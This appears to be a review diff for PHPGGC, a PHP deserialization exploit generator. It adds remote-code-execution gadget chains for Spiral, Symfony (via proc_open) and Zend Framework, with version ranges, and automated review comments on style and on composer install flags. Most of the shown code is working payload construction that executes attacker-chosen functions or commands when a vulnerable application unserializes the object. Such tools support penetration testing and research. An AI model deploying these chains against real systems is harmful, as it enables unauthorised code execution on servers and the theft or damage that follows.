44 | private $commandLoader; | |
45 | ||
46 | function __construct($function,$paramter) | |
47 | { | |
48 | $this->initialized = true; | |
49 | $this->commandLoader = new \Illuminate\Cache\Repository($function,$paramter); | |
50 | $this->commands = [new \Illuminate\Foundation\AliasLoader()]; | |
51 | } | |
52 | } | |
53 | } | |
54 | ||
55 | namespace Illuminate\Foundation{ | |
56 | class AliasLoader{ | |
57 | protected $aliases; | |
58 | ||
59 | function __construct() | |
60 | { | |
61 | $this->aliases = ["key"]; | |
62 | } | |
63 | } | |
64 | } | |
65 | ||
66 | namespace Illuminate\Cache{ | |
67 | class Repository{ | |
68 | protected $store; | |
69 | ||
70 | function __construct($function,$paramter) | |
71 | { | |
72 | $this->store = new \PhpOption\LazyOption($function,$paramter); | |
73 | } | |
74 | } | |
75 | } | |
76 | ||
77 | namespace PhpOption{ | |
78 | class LazyOption{ | |
79 | private $option; | |
80 | private $callback; | |
81 | private $arguments; | |
82 | ||
83 | function __construct($function,$paramter) | |
84 | { | |
85 | $this->callback = $function; | |
86 | $this->arguments = [$paramter]; | |
87 | } | |
88 | } | |
89 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Spiral; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '2.7.0 <= 2.8.13'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Monolog\Handler\RotatingFileHandler($function,$parameter); | |
16 | } | |
17 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace Monolog\Handler | |
3 | { | |
4 | class RotatingFileHandler | |
5 | { | |
6 | protected $mustRotate; | |
7 | protected $filename; | |
8 | protected $filenameFormat; | |
9 | protected $dateFormat; | |
10 | ||
11 | function __construct($function,$param) | |
12 | { | |
13 | $this->dateFormat = "l"; | |
14 | $this->mustRotate = true; | |
15 | $this->filename = "anything"; | |
16 | $this->filenameFormat = new \Spiral\Reactor\FileDeclaration($function,$param); | |
17 | } | |
18 | } | |
19 | } | |
20 | ||
21 | namespace Spiral\Reactor | |
22 | { | |
23 | class FileDeclaration | |
24 | { | |
25 | private $docComment; | |
26 | ||
27 | public function __construct($function,$parameter) | |
28 | { | |
29 | $this->docComment = new \PhpOption\LazyOption($function,$parameter); | |
30 | } | |
31 | } | |
32 | } | |
33 | ||
34 | namespace PhpOption | |
35 | { | |
36 | class LazyOption | |
37 | { | |
38 | private $callback; | |
39 | private $arguments; | |
40 | ||
41 | public function __construct($function,$parameter) | |
42 | { | |
43 | $this->callback = $function; | |
44 | $this->arguments = [$parameter]; | |
45 | } | |
46 | } | |
47 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Spiral; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '-2.8+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | public static $information = 'execute the function and throw an error'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \App\App($function,$parameter); | |
17 | } | |
18 | }⏎ |
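Review bot: `$information` reads `'execute the function and throw an error'`, which does not say what throws or when. An error after the call is an observable side effect, so it deserves precise wording, e.g. `'Executes the function; an error is thrown afterwards'`. The `$version` value `'-2.8+'` is not explained anywhere on this page. The entry object is `\App\App`, which by its namespace looks like an application class rather than a framework class, so a note on that prerequisite would help readers judge whether an installation is affected.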
0 | <?php | |
1 | ||
2 | namespace App | |
3 | { | |
4 | class App | |
5 | { | |
6 | protected $finalizer; | |
7 | ||
8 | function __construct($function,$param) | |
9 | { | |
10 | $this->finalizer = new \Spiral\Boot\Finalizer($function,$param); | |
11 | } | |
12 | } | |
13 | } | |
14 | ||
15 | namespace Spiral\Boot | |
16 | { | |
17 | class Finalizer | |
18 | { | |
19 | private $finalizers; | |
20 | ||
21 | function __construct($function,$param) | |
22 | { | |
23 | $this->finalizers = [[new \PhpOption\LazyOption($function,$param),"get"]]; | |
24 | } | |
25 | } | |
26 | } | |
27 | ||
28 | namespace PhpOption | |
29 | { | |
30 | class LazyOption | |
31 | { | |
32 | private $callback; | |
33 | private $arguments; | |
34 | ||
35 | public function __construct($function,$parameter) | |
36 | { | |
37 | $this->callback = $function; | |
38 | $this->arguments = [$parameter]; | |
39 | } | |
40 | } | |
41 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Symfony; | |
3 | ||
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE\Command | |
5 | { | |
6 | public static $version = 'v3.4.0-BETA4 <= v3.4.49 & v4.0.0-BETA4 <= v4.1.13'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | public static $information = 'Executes given command through proc_open()'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $command = $parameters['command']; | |
14 | ||
15 | return new \Symfony\Component\Routing\Loader\Configurator\ImportConfigurator( | |
16 | $command | |
17 | ); | |
18 | } | |
19 | } |
0 | <?php | |
1 | namespace Symfony\Component\Routing\Loader\Configurator | |
2 | { | |
3 | class ImportConfigurator | |
4 | { | |
5 | private $parent; | |
6 | ||
7 | function __construct($cmd) | |
8 | { | |
9 | $this->parent = new \Symfony\Component\Cache\Traits\RedisProxy($cmd); | |
10 | } | |
11 | } | |
12 | } | |
13 | ||
14 | namespace Symfony\Component\Cache\Traits | |
15 | { | |
16 | class RedisProxy | |
17 | { | |
18 | private $initializer; | |
19 | private $redis; | |
20 | ||
21 | function __construct($cmd) | |
22 | { | |
23 | $this->initializer = new \Symfony\Component\DependencyInjection\Loader\Configurator\InstanceofConfigurator($cmd); | |
24 | $this->redis = $cmd; | |
25 | } | |
26 | } | |
27 | } | |
28 | ||
29 | namespace Symfony\Component\DependencyInjection\Loader\Configurator | |
30 | { | |
31 | class InstanceofConfigurator | |
32 | { | |
33 | protected $parent; | |
34 | ||
35 | function __construct($cmd) | |
36 | { | |
37 | $this->parent = new \Symfony\Component\Cache\Simple\Psr6Cache($cmd); | |
38 | } | |
39 | ||
40 | } | |
41 | } | |
42 | ||
43 | namespace Symfony\Component\Cache\Simple | |
44 | { | |
45 | class Psr6Cache | |
46 | { | |
47 | private $pool; | |
48 | ||
49 | function __construct($cmd) | |
50 | { | |
51 | $this->pool = new \Symfony\Component\Cache\Adapter\PhpArrayAdapter($cmd); | |
52 | } | |
53 | ||
54 | } | |
55 | } | |
56 | ||
57 | namespace Symfony\Component\Cache\Adapter | |
58 | { | |
59 | class PhpArrayAdapter | |
60 | { | |
61 | private $values; | |
62 | private $createCacheItem; | |
63 | ||
64 | function __construct($cmd) | |
65 | { | |
66 | $this->values = array($cmd=>[]); | |
67 | $this->createCacheItem = "proc_open"; | |
68 | } | |
69 | } | |
70 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\ZendFramework; | |
3 | ||
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '2.0.0rc2 <= 2.5.3'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters["function"]; | |
13 | $parameter = $parameters["parameter"]; | |
14 | ||
15 | return new \Zend\Cache\Storage\Adapter\Memory($function, $parameter); | |
16 | } | |
17 | } |
0 | <?php | |
1 | namespace Zend\Cache\Storage\Adapter | |
2 | { | |
3 | class Memory | |
4 | { | |
5 | protected $eventHandles; | |
6 | protected $events; | |
7 | ||
8 | function __construct($function, $param) | |
9 | { | |
10 | $this->eventHandles = [1]; | |
11 | $this->events = new \Zend\View\Renderer\PhpRenderer($function, $param); | |
12 | } | |
13 | } | |
14 | } | |
15 | ||
16 | namespace Zend\View\Renderer | |
17 | { | |
18 | class PhpRenderer | |
19 | { | |
20 | private $__helpers; | |
21 | ||
22 | function __construct($function, $param) | |
23 | { | |
24 | $this->__helpers = new \Zend\Tag\Cloud\DecoratorPluginManager($function, $param); | |
25 | } | |
26 | } | |
27 | } | |
28 | ||
29 | namespace Zend\Tag\Cloud | |
30 | { | |
31 | class DecoratorPluginManager | |
32 | { | |
33 | protected $canonicalNames; | |
34 | protected $invokableClasses; | |
35 | protected $retrieveFromPeeringManagerFirst; | |
36 | protected $initializers; | |
37 | ||
38 | function __construct($function, $param) | |
39 | { | |
40 | $this->canonicalNames = array("detach"=>"cname","cname"=>"any"); | |
41 | $this->invokableClasses = array("cname"=>"Zend\Tag\Cloud\DecoratorPluginManager");//satisfying the class_exists | |
42 | $this->retrieveFromPeeringManagerFirst = false; | |
43 | $this->initializers = [new \Zend\Filter\FilterChain($function, $param)]; | |
44 | } | |
45 | } | |
46 | } | |
47 | ||
48 | namespace Zend\Filter | |
49 | { | |
50 | class FilterChain | |
51 | { | |
52 | protected $filters; | |
53 | ||
54 | function __construct($function, $param) | |
55 | { | |
56 | $this->filters = new \SplFixedArray(2); | |
57 | $this->filters[0] = array( | |
58 | new \Zend\Json\Expr($param), | |
59 | "__toString" | |
60 | ); | |
61 | $this->filters[1] = $function; | |
62 | } | |
63 | } | |
64 | } | |
65 | ||
66 | namespace Zend\Json | |
67 | { | |
68 | class Expr | |
69 | { | |
70 | protected $expression; | |
71 | ||
72 | function __construct($param) | |
73 | { | |
74 | $this->expression = $param; | |
75 | } | |
76 | } | |
77 | } |
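Review bot: The class name stored in `$this->invokableClasses` is written in a double-quoted string, `"Zend\Tag\Cloud\DecoratorPluginManager"`, which only survives because `\T`, `\C` and `\D` are not PHP escape sequences. A namespace segment starting with a lower-case `t`, `n` or `r` would be silently rewritten. Use single quotes, `'Zend\Tag\Cloud\DecoratorPluginManager'`, or `DecoratorPluginManager::class` inside this namespace. The trailing comment `//satisfying the class_exists` would read better on its own line above the assignment.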
231 | 231 | }, $classes); |
232 | 232 | |
233 | 233 | $gcs = array_combine($names, $classes); |
234 | ksort($gcs); | |
234 | ksort($gcs, SORT_NATURAL); | |
235 | 235 | |
236 | 236 | return $gcs; |
237 | 237 | } |
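Review bot: `SORT_NATURAL` on its own still compares case-sensitively, so mixed-case keys such as `Phalcon` and `PHPCSFixer` would not come out in the order the README table shows unless `$names` is already case-folded. That is decided by the closure that ends just above this hunk and is not visible here. If the keys are mixed case, `ksort($gcs, SORT_NATURAL | SORT_FLAG_CASE);` gives the listed order. Either way a short comment such as `// natural order: RCE10 after RCE9` would record why the flag is there.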
234 | 234 | """Uses composer to install a specific version of the package.""" |
235 | 235 | self.clean_workdir() |
236 | 236 | _, stderr = self._executor.composer( |
237 | "require", "-q", "--ignore-platform-reqs", f"{self.name}:{version}" | |
237 | "require", | |
238 | "--no-scripts", | |
239 | "--no-interaction", | |
240 | "--no-plugins", | |
241 | "--quiet", | |
242 | "--ignore-platform-reqs", | |
243 | f"{self.name}:{version}", | |
238 | 244 | ) |
239 | 245 | if stderr: |
240 | 246 | raise ValueError(f"Unable to install version: {version}") |
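Review bot: Failure is detected only by `if stderr:`, and the raised `ValueError` discards what composer printed, so a failed install and a harmless warning on stderr look the same to the caller. Consider including the captured text, e.g. `raise ValueError(f"Unable to install version: {version}: {stderr}")`, and checking the exit status if `self._executor.composer` exposes one. The first return value is ignored here, and the method's definition starts outside this hunk. The new `--no-scripts` and `--no-plugins` flags deserve a one-line comment such as `# do not run code shipped by the package under test`, because that is why they matter when installing arbitrary package versions.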